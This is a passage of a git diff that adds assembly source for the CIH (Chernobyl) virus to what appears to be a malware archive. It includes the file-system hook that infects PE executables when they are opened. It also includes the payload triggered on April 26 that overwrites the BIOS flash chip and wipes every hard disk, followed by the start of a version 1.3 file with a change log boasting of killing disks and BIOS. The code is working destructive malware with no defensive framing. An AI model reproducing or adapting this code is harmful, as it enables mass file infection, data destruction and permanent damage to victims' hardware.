EDX, and flags + + mov dr0, eax ; Save OldFileSystemApiHook Address + + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + mov dr0, eax ; Adjust OldFileSystemApiHook Address + + pop eax + + pop ebx + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? + +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + + push esi + + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + + add al, 40h + mov ah, ':' + + mov [esi], eax + + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. * +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + + jc DisableOnBusy + + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? * +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + + pushf + + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + + xor ecx, ecx + mov cl, 04h + xor edx, edx + mov dl, 3ch + call edi ; VXDCall IFSMgr_Ring0_FileIO + + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** + + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + + sub ecx, (SizeOfHeaders-@9)[esi] + jnc short OnlySetInfectedMark + + not ecx + inc ecx + + cmp cx, small CodeSizeOfMergeVirusCodeSection + jb OnlySetInfectedMark + +; *************************** +; * Save Original * +; * Address of Entry Point * +; *************************** + + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + + xchg ecx, eax ; ECX = Size of Section Table + + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + + push edi ; Size + + add edx, eax + push edx ; Pointer of File + + add eax, esi + push eax ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [eax+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + + add edx, edi + push edx ; Pointer of File + + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + + push ebx ; Size + + sub eax, 08h + mov [eax], ebx + + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + + push edi ; Address of Buffer + + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + + jmp WriteVirusCodeToFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + + xor ax, 0426h ; 04/26/???? + jne DisableOnBusy + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' + db MinorVirusVersion+'0' + db ' TTIT' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_13.asm b/MSDOS/Virus.MSDOS.Unknown.cih_13.asm new file mode 100644 index 00000000..403bd8d3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih_13.asm @@ -0,0 +1,1490 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Original Place : TTIT of Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.3 * +; * Modification Time : 05/24/1998 * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; *==========================================================================* +; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * +; * So When Open WinZip Self-Extractor ==> Don't Infect it. * +; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * +; **************************************************************************** + + .586P + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +MajorVirusVersion = 1 +MinorVirusVersion = 3 + +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + + +IF 